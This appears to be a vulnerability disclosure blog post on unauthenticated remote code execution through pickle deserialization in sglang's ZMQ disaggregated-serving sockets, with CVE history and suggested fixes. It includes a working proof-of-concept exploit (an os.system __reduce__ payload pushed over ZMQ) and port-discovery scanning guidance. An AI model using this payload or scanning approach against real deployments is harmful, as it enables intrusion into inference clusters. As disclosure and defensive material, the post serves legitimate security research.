sglang: Unauthenticated RCE via Pickle Deserialization in ZMQ Transport (Disaggregated Serving)

Introduction

This one comes with a transparency disclaimer: the vulnerability I’m reporting in sglang is already known. Multiple researchers have flagged it, and the maintainers have acknowledged it. I independently discovered the same ZMQ pickle surface during a systematic audit in February 2026. Since then, CERT/CC assigned CVE-2026-3059 and CVE-2026-3060 on March 12, 2026 - without a patch from the maintainers, which suggests sglang was equally unresponsive to CERT/CC. As of this writing, pickle.loads() is still in the codebase on the main branch.

sglang is a fast serving framework for large language models with 23,484 GitHub stars. Its ZMQ transport layer for disaggregated serving calls pickle.loads() on data received from network-bound ZMQ sockets with no authentication. This is a separate vulnerability from CVE-2025-10164, which covers only the HTTP /update_weights_from_tensor endpoint.

Target: sgl-project/sglang
Stars: 23,484
Severity: Critical (CVSS 3.1: 9.8)

What is sglang?

sglang (SGLang) is one of the most popular LLM (Large Language Model) serving frameworks, known for its speed and efficiency. It supports disaggregated serving, where the prefill (prompt processing) and decode (token generation) phases run on separate GPU nodes connected via ZMQ sockets. This architecture is used in enterprise deployments - the project’s documentation describes running DeepSeek-V3 across 96 H100 GPUs.

The disaggregated serving mode creates ZMQ PULL sockets for inter-node communication. These sockets receive serialized data from remote nodes and deserialize it with pickle.loads().

The Vulnerability

The core issue is in python/sglang/srt/disaggregation/encode_receiver.py.

Line 209 - synchronous receiver:

parts = self.recv_socket.recv_multipart(flags=zmq.NOBLOCK, copy=False)
recv_obj: EmbeddingData = pickle.loads(parts[0])

Line 661 - async receiver (same pattern):

recv_obj: EmbeddingData = pickle.loads(parts[0])

The socket factory in common.py creates these sockets bound to all interfaces:

# common.py line 1444 - get_zmq_socket_on_host()
port = socket.bind_to_random_port("tcp://*")

The dynamically assigned port is then communicated to peers over plaintext HTTP (POST to {encoder_url}/scheduler_receive_url), making it discoverable via network sniffing.

There are additional pickle.loads() calls in shm_broadcast.py (lines 458, 461, 464) for shared memory broadcast communication.
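
For readers who have not run into this before, the reason a bare pickle.loads() matters is that the byte stream itself names the callable to invoke during loading. Here is a benign, local-only sketch of that mechanism. The Demo class is hypothetical and has nothing to do with sglang's EmbeddingData; it only shows that the sender, not the receiver, decides what runs.

```python
import pickle


class Demo:
    """Hypothetical class used only to illustrate __reduce__."""

    def __reduce__(self):
        # pickle stores "call int('42')" in the stream instead of a Demo object.
        return (int, ("42",))


payload = pickle.dumps(Demo())

# The receiver never asked for int(); the payload chose the callable.
result = pickle.loads(payload)

print(type(result).__name__, result)
```

The loaded value is not a Demo instance at all. It is whatever the chosen callable returned, which is why a type annotation on the receiving variable offers no protection.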

Distinction from CVE-2025-10164

CVE-2025-10164 was patched in sglang v0.5.4 via PR #11909, which added a SafeUnpickler to the HTTP API endpoint /update_weights_from_tensor. That fix does NOT cover the ZMQ transport layer. The ZMQ sockets are separate code paths with separate network bindings.
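
I have not reproduced the code from PR #11909 here. As a rough sketch of the general technique, the standard library's documented approach is to subclass pickle.Unpickler and override find_class() with an allowlist. The names RestrictedUnpickler, restricted_loads, and ALLOWED_GLOBALS below are my own, and the allowlist contents are an assumption chosen purely for illustration.

```python
import io
import pickle
from collections import OrderedDict

# Assumption: only these (module, name) pairs may be resolved during loading.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses any global outside the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in stand-in for pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Malicious:
    """Hypothetical payload that tries to resolve builtins.eval on load."""

    def __reduce__(self):
        return (eval, ("1 + 1",))


# Allowed: plain containers and allowlisted classes load normally.
ok = restricted_loads(pickle.dumps(OrderedDict(a=[1, 2, 3])))

# Blocked: the payload names a global that is not on the allowlist.
try:
    restricted_loads(pickle.dumps(Malicious()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

An allowlist like this narrows the attack surface but is only as safe as the classes it admits, which is why a data-only format is the stronger option.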

Prior Art - Full Transparency

I want to be completely transparent about the history here:

Researcher Avi Lumelsky has been reporting this ZMQ pickle vulnerability since February 2025 across multiple issues (#3343, #5569, #11720). All were closed without fixing pickle.loads() - #11720 was explicitly auto-closed by the stale bot.
PR #5752 (May 2025) partially addressed the issue by restricting the ZMQ bind address from * to connect_ip, but it did NOT fix pickle.loads(). The deserialization is still unsafe.
Oligo Security’s ShadowMQ research (November 2025) publicly named sglang as having “incomplete fixes” for ZMQ pickle deserialization. Their blog post covered the vulnerability class across multiple ML frameworks.
A maintainer responded in November 2025: “Does not impact isolated clusters yet. But we will have a fix soon.” No fix has materialized.

At the time of my report in February 2026, sglang had CVE-2025-10164 for the HTTP endpoint, but nothing for the ZMQ surface. Every peer project had patched the equivalent ZMQ vulnerability. CERT/CC has since assigned CVEs on March 12, but the code remains unchanged:

Framework	CVE	Status
vLLM	CVE-2025-32444	Patched (CVSS 10.0)
TensorRT-LLM	CVE-2025-23254	Patched
Meta Llama Stack	CVE-2024-50050	Patched
Modular Max	CVE-2025-60455	Patched
sglang	CVE-2026-3059, CVE-2026-3060	CVE assigned (CERT/CC, March 12 2026) - still unfixed

sglang now has CVEs thanks to CERT/CC, but remains the only major inference framework that hasn’t actually patched the issue.

Proof of Concept

The Exploit

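import os
import pickle

import zmq

class RCE:
    # pickle calls __reduce__ when serializing; the callable and arguments it
    # returns are invoked by pickle.loads() on the receiving side.
    def __reduce__(self):
        return (os.system, ('id > /tmp/sglang_pwned',))

ctx = zmq.Context()
sock = ctx.socket(zmq.PUSH)  # PUSH pairs with the receiver's PULL socket
sock.connect('tcp://target:PORT')  # dynamic, from network sniff or ZMQ scan
sock.send_multipart([pickle.dumps(RCE())])  # frame 0 is what the receiver unpickles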

Port Discovery

The ZMQ PULL sockets use ephemeral ports assigned by bind_to_random_port(). An attacker can discover them by:

Sniffing the plaintext HTTP communication where ports are exchanged between nodes
Scanning the ephemeral port range (32768-60999) for the 0xFF byte that opens every ZMTP greeting

As part of this research, I submitted a PR to nmap adding a ZMTP service detection probe and NSE script that identifies ZMQ sockets, extracts their version, mechanism, and socket type. This makes discovering exposed ZMQ services trivial with a standard nmap -sV scan.
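
The greeting check mentioned in the list above can be sketched with nothing but the standard library, which is also handy for defenders auditing their own hosts. This is not the nmap probe itself. It assumes the peer sends its 10-byte ZMTP signature (0xFF, eight padding bytes, 0x7F) as soon as the TCP connection is accepted, which matches my understanding of libzmq's behaviour. The function names are my own.

```python
import socket

ZMTP_SIGNATURE_LEN = 10


def looks_like_zmtp(data: bytes) -> bool:
    """True if data starts with a ZMTP signature: 0xFF, 8 padding bytes, 0x7F."""
    return (
        len(data) >= ZMTP_SIGNATURE_LEN
        and data[0] == 0xFF
        and data[9] == 0x7F
    )


def probe(host: str, port: int, timeout: float = 1.0) -> bool:
    """Connect to host:port and report whether the peer volunteers a ZMTP signature."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            data = b""
            # Read until we have a full signature or the peer closes the connection.
            while len(data) < ZMTP_SIGNATURE_LEN:
                chunk = conn.recv(ZMTP_SIGNATURE_LEN - len(data))
                if not chunk:
                    break
                data += chunk
            return looks_like_zmtp(data)
    except OSError:
        # Refused, unreachable, or timed out: treat as "not ZMTP".
        return False
```

Calling probe("10.0.0.5", 40123) against a host you are authorised to test returns True when the service on that port answers with a ZMTP signature. The address and port here are placeholders.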

Note on Deployment Scope

Standard single-node deployment (python -m sglang.launch_server --model-path ...) does NOT create the vulnerable ZMQ sockets. The vulnerability is triggered only in:

PD disaggregation: --disaggregation-mode prefill or --disaggregation-mode decode
Multi-node distributed: --nnodes 2 or higher
Encoder disaggregation (multimodal): --encoder-only with --encoder-transfer-backend zmq_to_scheduler

These modes are used in enterprise and large-scale deployments.

Attack Surface

The “isolated cluster” defense from the maintainers deserves scrutiny. In practice:

Cloud GPU clusters often share a VPC (Virtual Private Cloud) network across workloads. A compromised node in one deployment can reach ZMQ ports in another on the same network.
Kubernetes allows all pod-to-pod traffic by default unless NetworkPolicies restrict it. A compromised pod can scan for ZMQ services.
The port exchange happens over plaintext HTTP, making it trivially interceptable.
The ZMQ 0xFF greeting byte makes port scanning fast and reliable - you don’t need to know which port to target.

The “trusted cluster” assumption is the same reasoning that led to CVE-2025-32444 in vLLM, CVE-2025-23254 in TensorRT-LLM, and CVE-2024-50050 in Meta Llama Stack. All three projects made the same argument before patching.

Suggested Fix

Replace pickle.loads() with a safe alternative. The SafeUnpickler pattern used in PR #11909 for the HTTP API could be extended to the ZMQ transport. Or better, switch to MessagePack or safetensors for tensor data.
Add CurveZMQ authentication. This provides both encryption and authentication for ZMQ sockets.
Bind to specific interfaces instead of tcp://* by default.
Encrypt the port exchange - currently the ZMQ port numbers are sent in plaintext over HTTP.
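
To make the CurveZMQ and interface-binding suggestions above concrete, here is a minimal pyzmq sketch. It is not sglang code: the helper names bind_curve_pull and connect_curve_push are hypothetical, key distribution is left out entirely, and it assumes a pyzmq build with CURVE support.

```python
import zmq


def bind_curve_pull(ctx, server_public, server_secret, host="127.0.0.1"):
    """Bind a PULL socket on one interface that requires a CURVE handshake."""
    sock = ctx.socket(zmq.PULL)
    sock.curve_secretkey = server_secret
    sock.curve_publickey = server_public
    sock.curve_server = True  # must be set before bind
    # Bind to a specific address instead of tcp://*.
    port = sock.bind_to_random_port(f"tcp://{host}")
    return sock, port


def connect_curve_push(ctx, server_public, host, port):
    """Connect a PUSH socket that encrypts to the given server public key."""
    client_public, client_secret = zmq.curve_keypair()
    sock = ctx.socket(zmq.PUSH)
    sock.curve_secretkey = client_secret
    sock.curve_publickey = client_public
    sock.curve_serverkey = server_public
    sock.connect(f"tcp://{host}:{port}")
    return sock
```

A sender without the server's public key cannot complete the handshake, so its frames never reach the PULL socket. Note that without a ZAP authenticator (pyzmq ships one in zmq.auth), any client that does hold the server's public key is accepted, so allowlisting client keys is a further step. CURVE also does not make pickle.loads() safe by itself: an authenticated peer can still send a malicious payload.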

Timeline

2025-02: Avi Lumelsky first reports ZMQ pickle issue (#3343)
2025-05: PR #5752 restricts bind address, does NOT fix pickle.loads()
2025-11: Oligo Security ShadowMQ research publicly names sglang
2025-11: Maintainer acknowledges, promises fix “soon”
2026-02-11: No fix deployed, no CVE assigned. Request submitted to VulnCheck.
2026-03-12: CERT/CC assigns CVE-2026-3059 and CVE-2026-3060 - published without a patch.
2026-03-18: pickle.loads() still present in encode_receiver.py on the main branch (lines 491, 727). Still no fix.

Takeaways

sglang is the odd one out. Every major peer has acknowledged the ZMQ pickle vulnerability, assigned a CVE, and deployed a fix. sglang has had the issue reported multiple times over the past year by multiple independent researchers and organizations - including me, Avi Lumelsky, Oligo Security, and CERT/CC - and has not shipped a patch.

CERT/CC eventually disclosed CVE-2026-3059 and CVE-2026-3060 on March 12, 2026 without a fix, which typically means the vendor was unresponsive to them as well. As of March 18, 2026, pickle.loads() is still in the main branch. The CVEs exist now, but the code hasn’t changed.